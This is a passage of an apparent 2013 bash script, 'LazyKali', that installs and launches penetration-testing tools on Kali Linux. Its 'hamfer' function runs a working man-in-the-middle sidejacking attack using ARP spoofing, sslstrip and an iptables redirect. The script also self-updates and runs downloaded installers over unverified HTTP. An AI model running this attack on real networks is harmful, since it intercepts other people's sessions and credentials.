├── Lazykali.sh └── README.md /Lazykali.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | ############################################## 5 | # 6 | # LazyKali by soufian-hamada 7 | # Just made this for when I feel lazy 8 | # Installs quite a few extras to a Fresh Kali:) 9 | # questions comments or request email me @: 10 | # www.facebook.com/soufian.ckin2u 11 | # 12 | ############################################## 13 | clear 14 | version="20130524" 15 | #some variables 16 | DEFAULT_ROUTE=$(ip route show default | awk '/default/ {print $3}') 17 | IFACE=$(ip route show | awk '(NR == 2) {print $3}') 18 | JAVA_VERSION=`java -version 2>&1 |awk 'NR==1{ gsub(/"/,""); print $3 }'` 19 | MYIP=$(ip route show | awk '(NR == 2) {print $9}') 20 | 21 | if [ $UID -ne 0 ]; then 22 | echo -e "\033[31This program must be run as root.This will probably fail.\033[m" 23 | sleep 3 24 | fi 25 | 26 | ###### Install script if not installed 27 | if [ ! -e "/usr/bin/lazykali" ];then 28 | echo "Script is not installed. Do you want to install it ? (Y/N)" 29 | read install 30 | if [[ $install = Y || $install = y ]] ; then 31 | cp -v $0 /usr/bin/lazykali 32 | chmod +x /usr/bin/lazykali 33 | #rm $0 34 | echo "Script should now be installed. Launching it !" 35 | sleep 3 36 | lazykali 37 | exit 1 38 | else 39 | echo -e "\e[32m[-] Ok,maybe later !\e[0m" 40 | fi 41 | else 42 | echo "Script is installed" 43 | sleep 1 44 | fi 45 | ### End of install process 46 | 47 | ### Check for updates ! 48 | if [[ "$silent" = "1" ]];then 49 | echo "Not checking for a new version : silent mode." 50 | else 51 | changelog=$(curl --silent -q http://yourgeekonthego.com/scripts/lazykali/changelog) 52 | last_version=$(curl --silent -q http://yourgeekonthego.com/scripts/lazykali/version) #store last version number to variable 53 | if [[ $last_version > $version ]];then # Comparing to current version 54 | echo -e "You are running version \033[31m$version\033[m, do you want to update to \033[32m$last_version\033[m? (Y/N) 55 | Last changes are : 56 | $changelog" 57 | read update 58 | if [[ $update = Y || $update = y ]];then 59 | echo "[+] Updating script..." 60 | wget -q http://yourgeekonthego.com/scripts/lazykali/lazykali.sh -O $0 61 | chmod +x $0 62 | echo "[-] Script updated !" 63 | if [[ $0 != '/usr/bin/yamas' && $ask_for_install = 'y' ]];then 64 | echo -e "Do you want to install it so that you can launch it with \"lazykali\" ?" 65 | read install 66 | if [[ $install = Y || $install = y ]];then #do not proceed to install if using installed version : updating it already "installed" it over. 67 | cp $0 /usr/bin/lazykali 68 | chmod +x /usr/bin/lazykali 69 | echo "Script should now be installed, launching lazykali !" 70 | sleep 3 71 | lazykali 72 | exit 1 73 | else 74 | echo "Ok, continuing with updated version..." 75 | sleep 3 76 | $0 77 | exit 1 78 | fi 79 | fi 80 | 81 | sleep 2 82 | $0 83 | exit 1 84 | else 85 | echo "Ok, continuing with current version..." 86 | fi 87 | else 88 | echo "No update available" 89 | fi 90 | fi 91 | ### End of update process 92 | 93 | #### pause function 94 | function pause(){ 95 | read -sn 1 -p "Press any key to continue..." 96 | } 97 | 98 | #### credits 99 | function credits { 100 | clear 101 | echo -e " 102 | \033[31m#######################################################\033[m 103 | Credits To 104 | \033[31m#######################################################\033[m" 105 | echo -e "\033[36m 106 | Special thanks to: 107 | Offensive Security for the awesome OS 108 | http://www.offensive-security.com/ 109 | http://www.kali.org/ 110 | 111 | ComaX for Yamas 112 | http://comax.fr/yamas.php 113 | 114 | Brav0hax for Easy-Creds 115 | https://github.com/brav0hax/easy-creds 116 | 117 | VulpiArgenti for PwnStar 118 | http://code.google.com/p/pwn-star/ 119 | 120 | skysploit for Simple-Ducky 121 | http://code.google.com/p/simple-ducky-payload-generator/ 122 | 123 | 0sm0s1z for Subterfuge 124 | http://code.google.com/p/subterfuge/ 125 | 126 | and anyone else I may have missed. 127 | 128 | \033[m" 129 | } 130 | 131 | #### Screwup function 132 | function screwup { 133 | echo "You Screwed up somewhere, try again." 134 | pause 135 | clear 136 | } 137 | 138 | 139 | ######## Update Kali 140 | function updatekali { 141 | clear 142 | echo -e " 143 | \033[31m#######################################################\033[m 144 | Let's Update Kali 145 | \033[31m#######################################################\033[m" 146 | select menusel in "Update Kali" "Update and Clean Kali" "Back to Main"; do 147 | case $menusel in 148 | "Update Kali") 149 | clear 150 | echo -e "\033[32mUpdating Kali\033[m" 151 | #apt-get update && apt-get -y dist-upgrade 152 | apt-get update && apt-get -y upgrade 153 | echo -e "\033[32mDone updating kali\033[m" 154 | pause 155 | clear ;; 156 | 157 | "Update and Clean Kali") 158 | clear 159 | echo -e "\033[32mUpdating and Cleaning Kali\033[m" 160 | apt-get update && apt-get -y dist-upgrade && apt-get autoremove -y && apt-get -y autoclean 161 | echo -e "\033[32mDone updating and cleaning kali\033[m" ;; 162 | 163 | "Back to Main") 164 | clear 165 | mainmenu ;; 166 | 167 | *) 168 | screwup 169 | updatekali ;; 170 | 171 | esac 172 | 173 | break 174 | 175 | done 176 | } 177 | 178 | ##### Metasploit Services 179 | function metasploitservices { 180 | clear 181 | echo -e " 182 | \033[31m#######################################################\033[m 183 | Metasploit Services 184 | \033[31m#######################################################\033[m" 185 | select menusel in "Start Metasploit Services" "Stop Metasploit Services" "Restart Metasploit Services" "Autostart Metasploit Services" "Back to Main"; do 186 | case $menusel in 187 | "Start Metasploit Services") 188 | echo -e "\033[32mStarting Metasploit Services..\033[m" 189 | service postgresql start && service metasploit start 190 | echo -e "\033[32mNow Open a new Terminal and launch msfconsole\033[m" 191 | pause ;; 192 | 193 | "Stop Metasploit Services") 194 | echo -e "\033[32mStoping Metasploit Services..\033[m" 195 | service postgresql stop && service metasploit stop 196 | pause ;; 197 | 198 | "Restart Metasploit Services") 199 | echo -e "\033[32mRestarting Metasploit Services..\033[m" 200 | service postgresql restart && service metasploit restart 201 | pause ;; 202 | 203 | "Autostart Metasploit Services") 204 | echo -e "\033[32mSetting Metasploit Services to start on boot..\033[m" 205 | update-rc.d postgresql enable && update-rc.d metasploit enable 206 | pause ;; 207 | 208 | "Back to Main") 209 | clear 210 | mainmenu ;; 211 | 212 | *) 213 | screwup 214 | metasploitservices ;; 215 | 216 | esac 217 | 218 | break 219 | 220 | done 221 | } 222 | 223 | ######## Open Vas Services 224 | function OpenVas { 225 | clear 226 | echo -e " 227 | \033[31m#######################################################\033[m 228 | OpenVas Services 229 | \033[31m#######################################################\033[m" 230 | select menusel in "Start OpenVas Services" "Stop OpenVas Services" "Rollback V5" "Back to Main"; do 231 | case $menusel in 232 | "Start OpenVas Services") 233 | openvasstart 234 | pause 235 | OpenVas;; 236 | 237 | "Stop OpenVas Services") 238 | openvasstop 239 | pause 240 | OpenVas ;; 241 | 242 | "Rollback V5") 243 | rollbackopenvas 244 | pause 245 | OpenVas ;; 246 | 247 | "Back to Main") 248 | clear 249 | mainmenu ;; 250 | 251 | *) 252 | screwup 253 | OpenVas ;; 254 | 255 | 256 | esac 257 | 258 | break 259 | 260 | done 261 | } 262 | 263 | ######## Update Exploitdb 264 | function exploitdb { 265 | clear 266 | echo -e " 267 | \033[31m#######################################################\033[m 268 | Exploit-DB 269 | \033[31m#######################################################\033[m" 270 | select menusel in "Update Exploitdb" "Searchsploit" "Back to Main"; do 271 | case $menusel in 272 | "Update Exploitdb") 273 | updateexploitdb 274 | pause 275 | exploitdb;; 276 | 277 | "Searchsploit") 278 | searchsploit 279 | pause 280 | exploitdb ;; 281 | 282 | "Back to Main") 283 | clear 284 | mainmenu ;; 285 | 286 | *) 287 | screwup 288 | OpenVas ;; 289 | 290 | 291 | esac 292 | 293 | break 294 | 295 | done 296 | } 297 | 298 | 299 | ######## Sniffing and spoofing menu 300 | function sniffspoof { 301 | clear 302 | echo -e " 303 | \033[31m#######################################################\033[m 304 | Sniffing/Spoofing/MITM 305 | \033[31m#######################################################\033[m" 306 | select menusel in "Yamas" "EasyCreds" "PwnStar" "Subterfuge" "Ghost-Phisher" "Hamster&Ferret" "Back to Main"; do 307 | case $menusel in 308 | "Yamas") 309 | installyamas 310 | pause 311 | sniffspoof ;; 312 | 313 | "EasyCreds") 314 | easycreds 315 | pause 316 | sniffspoof ;; 317 | 318 | "PwnStar") 319 | pwnstar 320 | pause 321 | sniffspoof ;; 322 | 323 | "Subterfuge") 324 | subterfuge 325 | pause 326 | sniffspoof ;; 327 | 328 | "Ghost-Phisher") 329 | ghostphisher 330 | pause 331 | sniffspoof ;; 332 | 333 | "Hamster&Ferret") 334 | hamfer 335 | pause 336 | sniffspoof ;; 337 | 338 | "Back to Main") 339 | clear 340 | mainmenu ;; 341 | 342 | *) 343 | screwup 344 | sniffspoof ;; 345 | 346 | 347 | esac 348 | 349 | break 350 | 351 | done 352 | } 353 | 354 | ######## Sniffing and spoofing menu 355 | function payloadgen { 356 | clear 357 | echo -e " 358 | \033[31m#######################################################\033[m 359 | Sniffing/Spoofing/MITM 360 | \033[31m#######################################################\033[m" 361 | select menusel in "Simple-Ducky" "Back to Main"; do 362 | case $menusel in 363 | "Simple-Ducky") 364 | simpleducky 365 | pause 366 | payloadgen ;; 367 | 368 | "Back to Main") 369 | clear 370 | mainmenu ;; 371 | 372 | *) 373 | screwup 374 | sniffspoof ;; 375 | 376 | 377 | esac 378 | 379 | break 380 | 381 | done 382 | } 383 | 384 | function bleedingedge { 385 | #Add bleeding edge repository 386 | out=`grep "kali-bleeding-edge" /etc/apt/sources.list` &>/dev/null 387 | if [[ "$out" != *kali-bleeding-edge* ]]; then &>/dev/null 388 | echo "Bleeding Edge Repo is not installed. Do you want to install it ? (Y/N)" 389 | read install 390 | if [[ $install = Y || $install = y ]] ; then 391 | echo -e "\033[31m====== Adding Bleeding Edge repo and updating ======\033[m" 392 | echo "" >> /etc/apt/sources.list 393 | echo '# Bleeding Edge ' >> /etc/apt/sources.list 394 | echo 'deb http://repo.kali.org/kali kali-bleeding-edge main' >> /etc/apt/sources.list 395 | apt-get update 396 | apt-get -y upgrade 397 | else 398 | echo -e "\e[32m[-] Ok,maybe later !\e[0m" 399 | fi 400 | else 401 | echo -e "\e[32m[-] Bleeding Edge Repo already there!\e[0m" 402 | sleep 1 403 | fi 404 | } 405 | 406 | function installangryip { 407 | if [ ! -e "/usr/bin/ipscan" ];then 408 | echo "AngryIp Scanner is not installed. Do you want to install it ? (Y/N)" 409 | read install 410 | if [[ $install = Y || $install = y ]] ; then 411 | echo -e "\033[31m====== Installing Angry IP Scanner ======\033[m" 412 | # Install angry-IP-scanner 413 | cd /root/ &>/dev/null 414 | if [ $(uname -m) == "x86_64" ] ; then 415 | #64 bit system 416 | wget -N http://sourceforge.net/projects/ipscan/files/ipscan3-binary/3.2/ipscan_3.2_amd64.deb &>/dev/null 417 | dpkg -i ipscan_3.2_amd64.deb &>/dev/null 418 | else 419 | #32 bit system 420 | wget -N http://sourceforge.net/projects/ipscan/files/ipscan3-binary/3.2/ipscan_3.2_i386.deb &>/dev/null 421 | dpkg -i ipscan_3.2_i386.deb &>/dev/null 422 | fi 423 | pause 424 | exit 1 425 | else 426 | echo -e "\e[32m[-] Ok,maybe later !\e[0m" 427 | fi 428 | else 429 | echo -e "\e[32m[-] AngryIP Scanner is installed!\e[0m" 430 | fi 431 | } 432 | 433 | function installterminator { 434 | echo "This will install Terminator. Do you want to install it ? (Y/N)" 435 | read install 436 | if [[ $install = Y || $install = y ]] ; then 437 | apt-get -y install terminator 438 | echo -e "\e[32m[-] Done Installing Terminator!\e[0m" 439 | else 440 | echo -e "\e[32m[-] Ok,maybe later !\e[0m" 441 | fi 442 | } 443 | 444 | function installxchat { 445 | echo "This will install Xchat. Do you want to install it ? (Y/N)" 446 | read install 447 | if [[ $install = Y || $install = y ]] ; then 448 | apt-get -y install xchat 449 | echo -e "\e[32m[-] Done Installing XChat!\e[0m" 450 | else 451 | echo -e "\e[32m[-] Ok,maybe later !\e[0m" 452 | fi 453 | } 454 | 455 | function installnautilusopenterm { 456 | echo "This will install Nautilus Open Terminal. Do you want to install it ? (Y/N)" 457 | read install 458 | if [[ $install = Y || $install = y ]] ; then 459 | apt-get -y install nautilus-open-terminal 460 | gsettings set org.gnome.desktop.default-applications.terminal exec /usr/bin/terminator 461 | gsettings set org.gnome.desktop.default-applications.terminal exec-arg "-x" 462 | echo -e "\e[32m[-] Done Installing Nautilus Open Terminal!\e[0m" 463 | else 464 | echo -e "\e[32m[-] Ok,maybe later !\e[0m" 465 | fi 466 | 467 | } 468 | 469 | function installunicornscan { 470 | if [ ! -f /usr/local/bin/unicornscan ]; then 471 | echo "This will install Unicornscan. Do you want to install it ? (Y/N)" 472 | read install 473 | if [[ $install = Y || $install = y ]] ; then 474 | echo -e "\033[31m====== Installing Flex ======\033[m" 475 | apt-get install flex &>/dev/null 476 | echo -e "\033[32m====== Done Installing Flex ======\033[m" 477 | echo -e "\033[31m====== Installing Unicornscan ======\033[m" 478 | cd /root/ &>/dev/null 479 | wget -N http://unicornscan.org/releases/unicornscan-0.4.7-2.tar.bz2 480 | bzip2 -cd unicornscan-0.4.7-2.tar.bz2 | tar xf - 481 | cd unicornscan-0.4.7/ 482 | ./configure CFLAGS=-D_GNU_SOURCE && make && make install 483 | cd /root/ &>/dev/null 484 | rm -rf unicornscan-0.4.7* 485 | echo -e "\033[32m====== All Done ======\033[m" 486 | echo "Launch a new terminal and enter unicornscan to run." 487 | else 488 | echo -e "\e[32m[-] Ok,maybe later !\e[0m" 489 | fi 490 | else 491 | echo -e "\e[32m[-] Done Installing Unicornscan!\e[0m" 492 | echo "Launch a new terminal and enter unicornscan to run." 493 | 494 | fi 495 | } 496 | 497 | function installyamas { 498 | if [ ! -f /usr/bin/yamas ]; then 499 | echo "Yamas is not installed. Do you want to install it ? (Y/N)" 500 | read install 501 | if [[ $install = Y || $install = y ]] ; then 502 | cd /tmp 503 | wget http://comax.fr/yamas/bt5/yamas.sh 504 | cp yamas.sh /usr/bin/yamas 505 | chmod +x /usr/bin/yamas 506 | rm yamas.sh 507 | cd 508 | echo "Script should now be installed. Launching it !" 509 | sleep 3 510 | gnome-terminal -t "Yamas" -x bash yamas 2>/dev/null & sleep 2 511 | exit 1 512 | else 513 | echo -e "\e[32m[-] Ok,maybe later !\e[0m" 514 | fi 515 | else 516 | echo "Script is installed" 517 | gnome-terminal -t "Yamas" -x bash yamas 2>/dev/null & sleep 2 518 | sleep 1 519 | fi 520 | } 521 | 522 | 523 | ######## install hackpack 524 | function installhackpack { 525 | echo "This will install Hackpack. Do you want to install it ? (Y/N)" 526 | read install 527 | if [[ $install = Y || $install = y ]] ; then 528 | cd /tmp 529 | wget http://lazykali.googlecode.com/files/hackpack.tar.gz 530 | tar zxvf hackpack.tar.gz 531 | cd hackpack 532 | echo -e "\033[31m====== Installing ======\033[m" 533 | ./install.sh 534 | echo -e "\e[32m[-] Done !\e[0m" 535 | cd ../ 536 | echo -e "\033[31m====== Cleaning up ======\033[m" 537 | rm hackpack.tar.gz 538 | rm -rf hackpack 539 | echo -e "\e[32m[-] Done !\e[0m" 540 | else 541 | echo -e "\e[32m[-] Ok,maybe later !\e[0m" 542 | fi 543 | 544 | } 545 | 546 | 547 | 548 | function easycreds { 549 | if [ ! -f /usr/bin/easy-creds ]; then 550 | echo "This will install Easy-Creds. Do you want to install it ? (Y/N)" 551 | read install 552 | if [[ $install = Y || $install = y ]] ; then 553 | echo -e "\033[31m====== Installing Depends ======\033[m" 554 | apt-get -y install screen hostapd dsniff dhcp3-server ipcalc aircrack-ng 555 | echo -e "\033[32m====== Done Installing Depends ======\033[m" 556 | echo -e "\033[31m====== Installing Easy-Creds ======\033[m" 557 | git clone git://github.com/brav0hax/easy-creds.git /opt/easy-creds 558 | ln -s /opt/easy-creds/easy-creds.sh /usr/bin/easy-creds 559 | cd /root/ &>/dev/null 560 | echo -e "\033[32m===== All Done ======\033[m" 561 | echo "Launching easy-creds in new window !" 562 | gnome-terminal -t "Easy-Creds" -e easy-creds 2>/dev/null & sleep 2 563 | else 564 | echo -e "\e[32m[-] Ok,maybe later !\e[0m" 565 | fi 566 | else 567 | echo "Easy-Creds is installed." 568 | echo "Launching easy-creds in new window !" 569 | gnome-terminal -t "Easy-Creds" -e easy-creds 2>/dev/null & sleep 2 570 | fi 571 | } 572 | 573 | ######### PwnStar 574 | function pwnstar { 575 | if [ ! -e "/opt/PwnSTAR_0.9/PwnSTAR_0.9" ];then 576 | echo "PwnStar is not installed. Do you want to install it ? (Y/N)" 577 | read install 578 | if [[ $install = Y || $install = y ]] ; then 579 | mkdir /opt/PwnSTAR_0.9 580 | cd /opt/PwnSTAR_0.9 581 | wget http://pwn-star.googlecode.com/files/PwnSTAR_0.9.tgz 582 | tar -zxvf PwnSTAR_0.9.tgz 583 | mv hotspot_3 /var/www/ && mv portal_hotspot /var/www/ && mv portal_pdf /var/www/ && mv portal_simple /var/www/ 584 | #rm $0 585 | echo "PwnStar should now be installed. Launching it !" 586 | sleep 3 587 | gnome-terminal -t "PwnStar" -e /opt/PwnSTAR_0.9/PwnSTAR_0.9 2>/dev/null & sleep 2 588 | pause 589 | sniffspoof 590 | exit 1 591 | else 592 | echo -e "\e[32m[-] Ok,maybe later !\e[0m" 593 | fi 594 | else 595 | echo "PwnStar is installed, Launching it now!" 596 | sleep 1 597 | gnome-terminal -t "PwnStar" -e /opt/PwnSTAR_0.9/PwnSTAR_0.9 2>/dev/null & sleep 2 598 | fi 599 | } 600 | 601 | ### Hunting with rodents hamster and ferret 602 | function hamfer { 603 | if [ ! -e "/usr/share/hamster-sidejack/ferret" ];then 604 | echo -e "\033[31m[+] Creating link /usr/share/hamster-sidejack/ferret\033[m" 605 | echo "we need this to avoid file not found error" 606 | ln -s /usr/bin/ferret /usr/share/hamster-sidejack/ferret 607 | hamfer 608 | else 609 | echo -e "\033[31m[+] Starting Sidejacking with Hamster & Ferret.\033[m" 610 | echo "1" > /proc/sys/net/ipv4/ip_forward 611 | iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1000 612 | sslstrip -f -a -k -l 1000 -w /root/out.txt & 613 | sleep 4 614 | xterm -T "arpspoof" -e arpspoof -i $IFACE $DEFAULT_ROUTE & 615 | sleep 2 616 | #xterm -e /usr/share/hamster-sidejack/ferret -i $IFACE 2>/dev/null & sleep 2 617 | cd /usr/share/hamster-sidejack 618 | xterm -e ./hamster 2>/dev/null & sleep 2 619 | echo -e "\n\033[31m[+] Attack is running\033[m.\nSet browser proxy to 127.0.0.1:1234\nIn Browser go to http://hamster\nPress (q) to stop" 620 | cd 621 | while read -n1 char 622 | do 623 | case $char in 624 | q) 625 | break 626 | ;; 627 | 628 | * ) 629 | echo -ne "\nInvalid character '$char' entered. Press (q) to quit." 630 | esac 631 | done 632 | echo -e "\033[31m\n[+] Killing processes and resetting iptable.\033[m" 633 | killall sslstrip 634 | killall arpspoof 635 | killall ferret 636 | killall hamster 637 | echo "0" > /proc/sys/net/ipv4/ip_forward 638 | iptables --flush 639 | iptables --table nat --flush 640 | iptables --delete-chain 641 | iptables --table nat --delete-chain 642 | echo -e "\033[32m[-] Clean up successful !\033[m" 643 | 644 | fi 645 | 646 | } 647 | 648 | #####simple-ducky 649 | function installsimpleducky { 650 | if [ ! -e "/usr/bin/simple-ducky" ];then 651 | echo "Simple-Ducky is not installed. Do you want to install it ? (Y/N)" 652 | read install 653 | if [[ $install = Y || $install = y ]] ; then 654 | wget https://simple-ducky-payload-generator.googlecode.com/files/installer_v1.1.0_debian.sh 655 | chmod +x installer_v1.1.0_debian.sh 656 | ./installer_v1.1.0_debian.sh 657 | rm installer_v1.1.0_debian.sh 658 | echo -e "\e[1;34mDone! Be sure to run Option's 5 and 6 prior to generating any payloads.\e[0m" 659 | else 660 | echo -e "\e[32m[-] Ok,maybe later !\e[0m" 661 | fi 662 | else 663 | echo -e "\e[32m[-] Simple-Ducky is installed!\e[0m" 664 | echo "Launch a new terminal and enter simple-ducky to run." 665 | fi 666 | } 667 | 668 | ################################################################################# 669 | # JAVA JDK Update 670 | ################################################################################# 671 | function installjava { 672 | echo -e "\e[1;31mThis option will update your JDK version to jdk1.7.0\e[0m" 673 | echo -e "\e[1;31mUse this only if java not installed or your version is older than this one!\e[0m" 674 | echo -e "\e[1;31mYour current Version is : $JAVA_VERSION\e[0m" 675 | echo "Do you want to install it ? (Y/N)" 676 | read install 677 | if [[ $install = Y || $install = y ]] ; then 678 | read -p "Are you using a 32bit or 64bit operating system [ENTER: 32 or 64]? " operatingsys 679 | if [ "$operatingsys" == "32" ]; then 680 | echo -e "\e[1;31m[+] Downloading and Updating to jdk1.7.0\e[0m" 681 | echo -e "" 682 | wget --no-cookies --header "Cookie: gpw_e24=http%3A%2F%2Fwww.oracle.com" "http://download.oracle.com/otn-pub/java/jdk/7/jdk-7-linux-i586.tar.gz" 683 | tar zxvf jdk-7-linux-i586.tar.gz 684 | mv jdk1.7.0 /usr/lib/jvm 685 | update-alternatives --install /usr/bin/java java /usr/lib/jvm/jdk1.7.0/jre/bin/java 2 686 | echo -e "\e[1;34mWhen prompted, select option 2\e[0m" 687 | sleep 2 688 | echo -e "" 689 | update-alternatives --config java 690 | rm jdk-7-linux-i586.tar.gz 691 | echo -e "" 692 | echo -e "\e[1;34mYour new JDk version is...\e[0m" 693 | echo "" 694 | java -version 695 | sleep 3 696 | echo "" 697 | else 698 | echo -e "\e[1;31m[+] Downloading and Updating to jdk1.7.0\e[0m" 699 | echo -e "" 700 | wget --no-cookies --header "Cookie: gpw_e24=http%3A%2F%2Fwww.oracle.com" "http://download.oracle.com/otn-pub/java/jdk/7u17-b02/jdk-7u17-linux-x64.tar.gz" 701 | tar zxvf jdk-7u17-linux-x64.tar.gz 702 | mv jdk1.7.0_17/ /usr/lib/jvm 703 | update-alternatives --install /usr/bin/java java /usr/lib/jvm/jdk1.7.0_17/jre/bin/java 2 704 | echo -e "\e[1;34mWhen prompted, select option 2\e[0m" 705 | sleep 2 706 | echo -e "" 707 | update-alternatives --config java 708 | rm jdk-7u17-linux-x64.tar.gz 709 | echo -e "" 710 | echo -e "\e[1;34mYour new JDk version is...\e[0m" 711 | echo "" 712 | java -version 713 | sleep 3 714 | echo "" 715 | fi 716 | else 717 | echo -e "\e[32m[-] Ok,maybe later !\e[0m" 718 | fi 719 | 720 | } 721 | 722 | 723 | ######## update ettercap 724 | function installettercap { 725 | etterversion=`ettercap -version |awk '(NR==2) { print $2 }'` 726 | echo -e "\e[1;31mThis option will update your Ettercap version to ettercap 0.7.6\e[0m" 727 | echo -e "\e[1;31mThis may break the ettercap repo. Will have to see when ettercap is upgraded in the repos\e[0m" 728 | echo -e "\e[1;31mYour current Version is : $etterversion\e[0m" 729 | echo "Do you want to continue with the install? (Y/N)" 730 | read install 731 | if [[ $install = Y || $install = y ]] ; then 732 | echo -e "\e[31m[+] Installing depends.\e[0m" 733 | apt-get install debhelper cmake bison flex libgtk2.0-dev libltdl3-dev libncurses-dev libncurses5-dev libnet1-dev libpcap-dev libpcre3-dev libssl-dev ghostscript python-gtk2-dev libpcap0.8-dev 734 | echo -e "\e[32m[-] Done Installing Depends!\e[0m" 735 | cd /tmp 736 | echo -e "\e[31m[+] Downloading Ettercap.\e[0m" 737 | git clone https://github.com/Ettercap/ettercap.git 738 | echo -e "\e[31m[+] Building Ettercap.\e[0m" 739 | cd ettercap 740 | mkdir build 741 | cd build 742 | cmake ../ 743 | make 744 | echo -e "\e[32m[-] Done Building Ettercap!\e[0m" 745 | echo -e "\e[31m[+] Installing Ettercap.\e[0m" 746 | make install 747 | echo -e "\e[32m[-] Done Installing Ettercap!\e[0m" 748 | echo -e "\e[31m[+] Deleting temp install files.\e[0m" 749 | cd ../../ 750 | rm -rf ettercap/ 751 | echo -e "\e[32m[-] Done deleting install files!\e[0m" 752 | echo -e "\e[1;31mYour current Version or Ettercap is : $etterversion\e[0m" 753 | else 754 | echo -e "\e[32m[-] Ok,maybe later !\e[0m" 755 | fi 756 | 757 | } 758 | 759 | ################################################################################# 760 | # Install Google Chrome 761 | ################################################################################# 762 | function installgooglechrome { 763 | echo -e "\e[1;31mThis option will install Google Chrome Latest Version!\e[0m" 764 | echo "Do you want to install it ? (Y/N)" 765 | read install 766 | if [[ $install = Y || $install = y ]] ; then 767 | read -p "Are you using a 32bit or 64bit operating system [ENTER: 32 or 64]? " operatingsys 768 | if [ "$operatingsys" == "32" ]; then 769 | echo -e "\e[1;31m[+] Downloading google-chrome-stable_current_i386\e[0m" 770 | wget wget https://dl.google.com/linux/direct/google-chrome-stable_current_i386.deb 771 | echo -e "\e[32m[-] Done with download!\e[0m" 772 | echo -e "\e[1;31m[+] Installing google-chrome\e[0m" 773 | dpkg -i google-chrome-stable_current_i386.deb 774 | cp /opt/google/chrome/google-chrome.desktop /usr/share/applications/google-chrome.desktop 775 | echo -e "\e[1;31m[+] Patching to run as root!\e[0m" 776 | head -n -1 /opt/google/chrome/google-chrome > temp.txt ; mv temp.txt /opt/google/chrome/google-chrome 777 | echo 'exec -a "$0" "$HERE/chrome" "$@" --user-data-dir' >> /opt/google/chrome/google-chrome 778 | chmod +x /opt/google/chrome/google-chrome 779 | echo -e "\e[32m[-] Done patching!\e[0m" 780 | rm google-chrome-stable_current_i386.deb 781 | echo -e "\e[32m[-] Done installing enjoy chrome!\e[0m" 782 | else 783 | echo -e "\e[1;31m[+] Downloading google-chrome-stable_current_amd64\e[0m" 784 | wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb 785 | echo -e "\e[32m[-] Done with download!\e[0m" 786 | echo -e "\e[1;31m[+] Installing google-chrome\e[0m" 787 | dpkg -i google-chrome-stable_current_amd64.deb 788 | cp /opt/google/chrome/google-chrome.desktop /usr/share/applications/google-chrome.desktop 789 | echo -e "\e[1;31m[+] Patching to run as root!\e[0m" 790 | head -n -1 /opt/google/chrome/google-chrome > temp.txt ; mv temp.txt /opt/google/chrome/google-chrome 791 | echo 'exec -a "$0" "$HERE/chrome" "$@" --user-data-dir' >> /opt/google/chrome/google-chrome 792 | chmod +x /opt/google/chrome/google-chrome 793 | echo -e "\e[32m[-] Done patching!\e[0m" 794 | rm google-chrome-stable_current_amd64.deb 795 | echo -e "\e[32m[-] Done installing enjoy chrome!\e[0m" 796 | fi 797 | else 798 | echo -e "\e[32m[-] Ok,maybe later !\e[0m" 799 | fi 800 | 801 | } 802 | 803 | function simpleducky { 804 | if [ ! -e "/usr/bin/simple-ducky" ];then 805 | echo "Simple-Ducky is not installed. Do you want to install it ? (Y/N)" 806 | read install 807 | if [[ $install = Y || $install = y ]] ; then 808 | installsimpleducky 809 | payloadgen 810 | exit 1 811 | else 812 | echo -e "\e[32m[-] Ok,maybe later !\e[0m" 813 | fi 814 | else 815 | echo -e "\e[31m[+] Launching Simple-Ducky now!\nBe sure to run Option's 5 and 6 prior to generating any payloads.\e[0m" 816 | sleep 1 817 | gnome-terminal -t "Simple-Ducky" -e "bash simple-ducky" 2>/dev/null & sleep 2 818 | fi 819 | } 820 | 821 | #####openvasstart 822 | function openvasstart { 823 | # style variables 824 | execstyle="[\e[01;32mx\e[00m]" # execute msgs style 825 | warnstyle="[\e[01;31m!\e[00m]" # warning msgs stylee 826 | infostyle="[\e[01;34mi\e[00m]" # informational msgs style 827 | 828 | #fun little banner 829 | clear 830 | echo -e "\e[01;32m 831 | ####### ###### ####### # # # # # ##### 832 | # # # # # ## # # # # # # # 833 | # # # # # # # # # # # # # 834 | # # ###### ##### # # # # # # # ##### 835 | # # # # # # # # # ####### # 836 | # # # # # ## # # # # # # 837 | ####### # ####### # # # # # ##### 838 | 839 | \e[0m" 840 | echo -e "\e[1;1m ..----=====*****(( Startup Script ))*******=====----..\e[0m" 841 | echo -e "\e[31m *************************************************************\e[0m" 842 | echo -e "\e[31m * *\e[0m" 843 | echo -e "\e[31m * \e[1;37mStarting All OpenVas Services \e[0;31m *\e[0m" 844 | echo -e "\e[31m * By soufian-hamada *\e[0m" 845 | echo -e "\e[31m *************************************************************\e[0m" 846 | 847 | echo 848 | echo -e "\e[31mKilling all Openvas for fresh start.\e[0m" 849 | #kill openvas scanner 850 | echo -e "$execstyle Checking OpenVas Scanner is running..." 851 | ps -ef | grep -v grep | grep openvassd 852 | if [ $? -eq 1 ] 853 | then 854 | echo -e "$warnstyle OpenVas Scanner not running!" 855 | else 856 | echo -e "$execstyle Stopping OpenVas Scanner..." 857 | killall openvassd 858 | fi 859 | 860 | #kill openvas administrator 861 | echo -e "$execstyle Checking if OpenVas Administrator is running..." 862 | ps -ef | grep -v grep | grep openvasad 863 | if [ $? -eq 1 ] 864 | then 865 | echo -e "$warnstyle OpenVas Administrator not running!" 866 | else 867 | echo -e "$execstyle Stopping OpenVas Administrator..." 868 | killall openvasad 869 | fi 870 | 871 | #kill openvas manager 872 | echo -e "$execstyle Checking if OpenVas Manager is running..." 873 | ps -ef | grep -v grep | grep openvasmd 874 | if [ $? -eq 1 ] 875 | then 876 | echo -e "$warnstyle OpenVas Manager not running!" 877 | else 878 | echo -e "$execstyle Stopping OpenVas Manager..." 879 | killall openvasmd 880 | fi 881 | 882 | #kill Greenbone Security Assistant 883 | echo -e "$execstyle Checking if Greenbone Security Assistant is running..." 884 | ps -ef | grep -v grep | grep gsad 885 | if [ $? -eq 1 ] 886 | then 887 | echo -e "$warnstyle Greenbone Security Assistant not running!" 888 | else 889 | echo -e "$execstyle Stopping Greenbone Security Assistant..." 890 | killall gsad 891 | fi 892 | 893 | #### all done! now start services 894 | echo 895 | echo -e "\033[31mAll Done!! :\033[m 896 | Now starting OpenVas services..." 897 | 898 | echo -e "\033[31mSyncing updates.......\033[m 899 | This may take a while!!!!" 900 | openvas-nvt-sync 901 | echo ok! 902 | 903 | echo -e "\e[31mStarting OpenVas Scanner.\e[0m" 904 | openvassd 905 | echo ok! 906 | 907 | echo -e "\033[31mRebuilding 